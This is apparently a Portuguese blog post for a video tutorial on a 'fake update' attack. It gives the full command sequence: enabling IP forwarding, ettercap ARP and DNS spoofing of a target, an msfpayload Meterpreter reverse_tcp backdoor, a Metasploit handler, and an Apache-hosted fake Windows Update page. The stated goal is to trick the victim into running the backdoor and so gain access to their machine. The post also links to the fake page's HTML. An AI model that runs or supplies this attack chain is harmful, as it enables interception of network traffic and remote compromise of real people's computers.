Atualização falsa [MITM+ettercap+metasploit+ES]

Posted: 18 julho 2010 by Bhior in Marcadores: ,
0


Nela aula eu mostro como usar engenharia social para efetuar um ataque. Na vídeo eu faço um MITM para redirecionar todo trafego de um host para meu micro, crio um backdoor com metasploit, faço uma pagina falsa de atualização do Windows que está em meu micro e inicio o apache, e espero que nosso alvo caia na engenharia social e execute o arquivo para que possamos ter acesso a maquina dele.

Programas usados:
Metasploit
Ettercap

Comandos:
msfpayload windows/meterpreter/reverse_tcp LHOST=SeuIP LPORT=8080 X > /NomeDoArquivo.exe
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost SeuIP
set lport 8080
exploit
*.*.* A SeuIP
echo 1 > /proc/sys/net/ipv4/ip_forward
ettercap -T -q -P dns_spoof -M ARP /IP do Router/ /IP do alvo/
/etc/init.d/apache2 start


HTML da pagina falsa: 

http://pastebin.com/PnVYNBqn
http://img831.imageshack.us/img831/9779/microsoft.jpg 


Informações:
Metasploit - www.metasploit.com
Ettercap - http://ettercap.sourceforge.net/index.php
MITM - http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Backdoor - http://pt.wikipedia.org/wiki/Backdoor

Sobre a falha: http://www.microsoft.com/brasil/technet/security/Bulletin/MS08-067.mspx

Sobre o vídeo:
Tamanho: 34.5 mb
Formato: avi
Duração: 10:46 min
Musica: Tokens - The Lion Sleeps Tonight


Baixar: http://www.4shared.com/file/aAg8RG3f/Atualizao_falsa-MITMEttercapme.html





0 comentários: